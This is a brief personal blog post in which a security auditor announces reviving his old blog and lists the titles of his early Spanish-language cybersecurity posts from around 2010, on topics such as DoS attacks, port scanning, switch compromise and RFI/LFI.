Recently, I have decided to revive my old blog by re-publishing my early cybersecurity posts as a tribute to where it all began. These posts, all in Spanish and flagged with ”[THE BEGINNINGS]” in their titles, were originally hosted on https://dan1t0.wordpress.com (El Rincón de dan1t0) back in 2010. At that time, I simply shared small tips and personal experiences that helped me take my first steps in IT security.

Reading these entries now, I am amazed at how far I’ve come. They remind me of my humble beginnings as a security auditor and ethical hacker. For sentimental reasons—and to preserve this important legacy—I am keeping these posts alive.

Below are the articles I’m referring to:

  • [THE BEGINNINGS] Tipos de ataques Denial-of-Service
  • [THE BEGINNINGS] Wireshark: Instalación en Mac OS y manual de uso
  • [THE BEGINNINGS] Análisis de redes: Enumeración de sistemas Windows
  • [THE BEGINNINGS] Qué es y cómo funciona un escaneo de puertos Idle
  • [THE BEGINNINGS] Seguridad: comprometiendo un switch (Parte 1 de 2)
  • [THE BEGINNINGS] Manifiesto por una Red Neutral
  • [THE BEGINNINGS] Seguridad: comprometiendo un switch (Parte 2 de 2)
  • [THE BEGINNINGS] GNS3: Instalación y configuración básica
  • [THE BEGINNINGS] Tips: Jailbreak iPad 4.2.1 Untethered Greenpois0n
  • [THE BEGINNINGS] Scapy: Construyendo un paquete UDP
  • [THE BEGINNINGS] ZAP y proxys Web: Analizar el trafico durante la navegación
  • [THE BEGINNINGS] RFI/LFI: ¿y ahora qué?
  • [THE BEGINNINGS] Configuración fácil y rápida de OpenVPN en MacOS X
  • [THE BEGINNINGS] DoS sobre renegociación SSL/TLS (CVE-2011-1473)
  • [THE BEGINNINGS] pySIM-Reader: Accediendo a una tarjeta SIM
  • [THE BEGINNINGS] Tools y Contribuciones

In this post, I explain my journey of reviving my blog by bringing these early entries back into the spotlight as a reminder of my progress over the years. Moving forward, the content here will focus on current cybersecurity topics, but I felt it was important to preserve these legacy posts for both sentimental and historical reasons.

Happy Hacking!
